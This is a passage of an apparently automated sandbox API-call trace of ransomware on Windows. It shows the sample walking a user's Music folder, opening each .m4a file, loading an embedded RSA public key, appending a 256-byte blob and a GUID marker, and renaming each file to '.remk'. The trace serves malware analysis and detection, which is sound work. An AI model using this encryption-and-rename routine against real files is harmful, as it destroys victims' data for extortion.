out: StringUuid=0x3adfa40) returned 0x0 [0232.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.671] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.671] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0232.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.672] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8bfa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.672] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.672] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.672] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.672] CloseHandle (hObject=0x640) returned 1 [0232.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0232.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0232.676] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qIBVS54In6hNtRDm0Wt.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qibvs54in6hntrdm0wt.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qIBVS54In6hNtRDm0Wt.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qibvs54in6hntrdm0wt.m4a.remk")) returned 1 [0232.678] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddb5dfc0, ftCreationTime.dwHighDateTime=0x1d5e276, ftLastAccessTime.dwLowDateTime=0x57528b50, ftLastAccessTime.dwHighDateTime=0x1d5e20c, ftLastWriteTime.dwLowDateTime=0x57528b50, ftLastWriteTime.dwHighDateTime=0x1d5e20c, nFileSizeHigh=0x0, nFileSizeLow=0x18696, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uahnmRfbMfNimbLS.m4a", cAlternateFileName="UAHNMR~1.M4A")) returned 1 [0232.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.678] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uahnmRfbMfNimbLS.m4a") returned=".m4a" [0232.678] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uahnmRfbMfNimbLS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uahnmrfbmfnimbls.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.679] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=99990) returned 1 [0232.679] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.682] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x18670, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.682] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.684] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x18696, lpOverlapped=0x0) returned 1 [0232.685] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0232.685] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.685] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.686] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0232.687] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.687] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.687] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0232.687] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.687] GetLastError () returned 0x0 [0232.687] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.687] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0232.687] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.687] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.687] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.688] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0232.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.689] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x18696, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.689] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.689] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.689] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.689] CloseHandle (hObject=0x640) returned 1 [0232.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0232.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0232.697] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uahnmRfbMfNimbLS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uahnmrfbmfnimbls.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uahnmRfbMfNimbLS.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uahnmrfbmfnimbls.m4a.remk")) returned 1 [0232.699] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba6ed0a0, ftCreationTime.dwHighDateTime=0x1d5dfef, ftLastAccessTime.dwLowDateTime=0x50faf330, ftLastAccessTime.dwHighDateTime=0x1d5da75, ftLastWriteTime.dwLowDateTime=0x50faf330, ftLastWriteTime.dwHighDateTime=0x1d5da75, nFileSizeHigh=0x0, nFileSizeLow=0x50d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UIIE3qr3SE h.m4a", cAlternateFileName="UIIE3Q~1.M4A")) returned 1 [0232.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0232.699] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UIIE3qr3SE h.m4a") returned=".m4a" [0232.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UIIE3qr3SE h.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uiie3qr3se h.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.700] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=20694) returned 1 [0232.700] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.703] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x50b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.703] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.705] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x50d6, lpOverlapped=0x0) returned 1 [0232.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0232.706] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.706] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.706] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0232.707] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.707] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.707] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0232.707] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.707] GetLastError () returned 0x0 [0232.707] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.707] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0232.707] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.707] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.707] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.707] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0232.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.708] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x50d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.708] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.708] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.708] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.708] CloseHandle (hObject=0x640) returned 1 [0232.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3ec8 [0232.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0232.710] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UIIE3qr3SE h.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uiie3qr3se h.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UIIE3qr3SE h.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uiie3qr3se h.m4a.remk")) returned 1 [0232.712] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x278e4030, ftCreationTime.dwHighDateTime=0x1d5de33, ftLastAccessTime.dwLowDateTime=0x7dbaf380, ftLastAccessTime.dwHighDateTime=0x1d5d8b2, ftLastWriteTime.dwLowDateTime=0x7dbaf380, ftLastWriteTime.dwHighDateTime=0x1d5d8b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vbTY960", cAlternateFileName="")) returned 1 [0232.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0232.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e2f0 [0232.712] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x461909e0, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0xa565df90, ftLastAccessTime.dwHighDateTime=0x1d5dcc6, ftLastWriteTime.dwLowDateTime=0xa565df90, ftLastWriteTime.dwHighDateTime=0x1d5dcc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xb4anhaDsw_nEnBFeS", cAlternateFileName="XB4ANH~1")) returned 1 [0232.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3ec8 [0232.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3d60 [0232.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba510 [0232.712] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x461909e0, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0xa565df90, ftLastAccessTime.dwHighDateTime=0x1d5dcc6, ftLastWriteTime.dwLowDateTime=0xa565df90, ftLastWriteTime.dwHighDateTime=0x1d5dcc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xb4anhaDsw_nEnBFeS", cAlternateFileName="XB4ANH~1")) returned 0 [0232.712] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0232.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0232.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5498 | out: hHeap=0x630000) returned 1 [0232.723] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0232.723] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0232.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0232.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0232.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.726] HeapFree (in: hHeap=0x630000, 